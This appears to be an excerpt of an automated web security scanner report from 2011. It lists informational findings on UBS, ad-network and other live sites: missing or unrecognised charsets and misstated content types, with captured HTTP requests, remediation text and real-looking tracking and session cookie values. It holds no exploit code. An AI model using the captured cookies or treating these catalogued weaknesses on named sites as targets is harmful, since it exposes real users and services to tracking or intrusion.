<HEAD>
<TITLE>Missing Ticker Error Page</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="styles/styles_rdsgn.css">
</HEAD>

<BODY>
<TABLE BORDER=
...[SNIP]...

22.15. https://onlineservices.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/

Request

GET / HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-length: 3494
content-type: text/html
date: Wed, 06 Jul 2011 14:08:13 GMT
last-modified: Fri, 27 Mar 2009 02:29:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">



<!-- All Rights Res
...[SNIP]...

22.16. https://onlineservices.ubs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981879305:ss=1309981804815

Response

HTTP/1.1 200 OK
content-length: 0
content-type: text/plain
date: Wed, 06 Jul 2011 13:51:30 GMT
last-modified: Fri, 26 Oct 2007 14:14:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

22.17. https://onlineservices.ubs.com/olsauth/ex/pbl/lo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/lo

Request

GET /olsauth/ex/pbl/lo HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.18. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dfp

Request

GET /olsauth/ex/pbl/ubso/dfp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.19. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dfu

Request

Response

22.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dl

Request

Response

22.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/pfu

Request

GET /olsauth/ex/pbl/ubso/pfu HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/pl

Request

GET /olsauth/ex/pbl/ubso/pl HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/_security.jsp

Request

GET /olsauth/public/SE/OLS/_security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/customerPrivacy37.jsp

Request

GET /olsauth/public/SE/OLS/customerPrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.25. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/importantLegalInformation.jsp

Request

Response

22.26. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

Request

Response

22.27. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/onlinePrivacy37.jsp

Request

GET /olsauth/public/SE/OLS/onlinePrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>
   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">

   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" lin
...[SNIP]...

22.28. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/privacyStatement37.jsp

Request

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">

   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"
...[SNIP]...

22.29. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/SE/OLS/security.jsp

Request

GET /olsauth/public/SE/OLS/security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.30. https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

Request

Response

22.31. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/staticfiles/olspages/documents/viewPrint.html

Request

Response

22.32. https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/staticfiles/pws/adobe/StatementofFinancialCondition.pdf

Request

GET /staticfiles/pws/adobe/StatementofFinancialCondition.pdf HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 480347
content-type: application/pdf
date: Wed, 06 Jul 2011 14:08:15 GMT
etag: "7545b-4d779b69"
last-modified: Wed, 09 Mar 2011 15:23:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

%PDF-1.4%....
1754 0 obj<</Linearized 1/L 480347/O 1756/E 45269/N 22/T 479697/H [ 488 541]>>endobj
1767 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<51AC7FE8
...[SNIP]...

23. HTML does not specify charset previous next
There are 14 instances of this issue:

http://ad.doubleclick.net/adi/N3285.google/B2343920.122
http://analytics.microsoft.com/Sync.html
http://analytics.msn.com/Include.html
http://bs.serving-sys.com/BurstingPipe/adServer.bs
https://fundgate.ubs.com/GIS/Default.aspx
http://jqueryui.com/about
http://jqueryui.com/themeroller/
https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm
https://nae.ubs.com/quotes
https://nae.ubs.com/quotes/markets_instruments
https://onesource.ubs.com/
https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html
http://p.brilig.com/contact/bct
http://pixel.invitemedia.com/data_sync

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

23.2. http://analytics.microsoft.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.microsoft.com
Path:	/Sync.html

Request

Response

23.3. http://analytics.msn.com/Include.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.msn.com
Path:	/Include.html

Request

Response

23.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

Response

23.5. https://fundgate.ubs.com/GIS/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fundgate.ubs.com
Path:	/GIS/Default.aspx

Request

GET /GIS/Default.aspx HTTP/1.1
Host: fundgate.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.6. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.7. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.8. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://nae.ubs.com
Path:	/awu/help/inter/en/ubsHelp.htm

Request

GET /awu/help/inter/en/ubsHelp.htm HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.9. https://nae.ubs.com/quotes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://nae.ubs.com
Path:	/quotes

Request

GET /quotes HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.10. https://nae.ubs.com/quotes/markets_instruments previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://nae.ubs.com
Path:	/quotes/markets_instruments

Request

GET /quotes/markets_instruments?locale=en_US HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982086459:ss=1309981804815

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 13:59:00 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1968
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instru
...[SNIP]...

23.11. https://onesource.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onesource.ubs.com
Path:	/

Request

GET / HTTP/1.1
Host: onesource.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.12. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/staticfiles/olspages/documents/viewPrint.html

Request

Response

23.13. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Request

Response

23.14. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Request

GET /data_sync?partner_id=31&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; segments_p1="eJwtUU1LAlEUJWcWr7ean9IP6Ce0r7W7Nv6GTFwkzcZokZUxWQRR6oxCH5KbxK9BclGUWkKghpHQEDSBpr1zaHM4nHvPPffdJ3XhFTSpi+0csPETUNidzCl8u4IyaEOJ94GjXkBq4jwk54UVNE4usp6uVJeeSg9oVtAxXVY0T2OZow4n4HsjcOcGfJ/KcRgRZT+gJqaCxvX/xI8xii1l1URNKKjAeHqH5icftTq3rTKzZiIzvCKlKNmakbYSvq6EbAh7D9DRMIGJLUyp0eMOwb1PYHFM5CuSHnh+Br7OjGfm7bD67UB5HyNvtqToZh/UWlT0ls5WEx0u85p0ZnmG+wyqLrOtR+CQb+yw54gblGLw+r/gKZ4nMgW/TANfO1AeHPAkL1HlfpEZVrAFtsmhuKZkKTpR3XiZRHnOPMfbHmOLwH6O16ceLwC/+LW7C/hD3szk9NEB5JSh6Bm72z6E2KqimSb+Z4rk7ob2B83Zo/U="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuG4v5hNgEniSNfFDywKjBpnZgBpA0YLMJ9LhGPiMlYBRonmTUuBsgwaDAYMFgxA0bcT2QQ4JB5vQBaV4Jg1gw2otmntUrBJTd23gCZB1M99DDLl+p0lKKasmA8S/dbUiiK65j8T0D3P0ER7F4DMbjn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE775kAYrO+NCAIroT6LIsiU/vkUVFOWb+YBFoZZZYdBpVeNdXFoGJjBLnlv9/hyw8C2jGNUaJKy//vUM2+uwLVgFmiX1P76GIfnwFdtyuCyiiszaCRG99P4gQBQCc9nZ9"; io_freq_p1="eJzjkuY4mCDAJHGk6+IHFgVGjSNrr31gMWC0APO5hDn6wgQYJZo3LQVKMmgwGDBYMAAFl8QLcEo83oAq+DIeqLJpLargnQig4PU7S5AERTi2hQocZJL41tSKovSHDdAZz9AElyUA9becffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCADwQWy8="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 06 Jul 2011 11:21:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 06-Jul-2011 11:21:20 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 26

<html><body></body></html>

24. HTML uses unrecognised charset previous next
There are 2 instances of this issue:

http://adonmax.com/afr.php
http://cang.baidu.com/do/add

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

24.1. http://adonmax.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://adonmax.com
Path:	/afr.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-8
uft8

Request

Response

24.2. http://cang.baidu.com/do/add previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://cang.baidu.com
Path:	/do/add

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

GB2312

Request

Response

25. Content type incorrectly stated previous next
There are 12 instances of this issue:

http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif
http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif
https://accountservices.passport.net/gethip.srf
http://api.mixpanel.com/track/
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
http://bs.serving-sys.com/BurstingPipe/adServer.bs
https://login.live.com/pp1100/RDHelper_JS.srf
https://manage.softlayer.com/favicon.ico
https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg
https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg
https://nae.ubs.com/favicon.ico
http://s.bebo.com/js/mootools-core-and-more-1.3.js

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

25.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a0.twimg.com
Path:	/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/534697216/MoMA_Twitter_Icon4_normal.gif HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 2R7/cqdGsVAd9FAQFI/8xuVbx3DQJPyoSpTepa4Qyq6KtMAhml6FeTVzri40fC2Z
x-amz-request-id: D98F6A057F73B07C
Last-Modified: Thu, 19 Nov 2009 22:50:19 GMT
ETag: "af2cabb308c3ca8203b70d63588b247f"
Accept-Ranges: bytes
Content-Length: 1690
Server: AmazonS3
X-Amz-Cf-Id: a415fcbc7cfa38e75c822e83635d23af15c4a9bcc56e5421754d04691bbf479cad13247eedf0cf39,58f5f4a65b5840a189a08e2ea2bc57d86b0936eec763c036e7e6977d0f6d6c16daa155c74a73a587
X-CDN: AKAM
X-CDN: AKAM
Cache-Control: max-age=24142482
Expires: Wed, 11 Apr 2012 00:15:48 GMT
Date: Wed, 06 Jul 2011 14:01:06 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
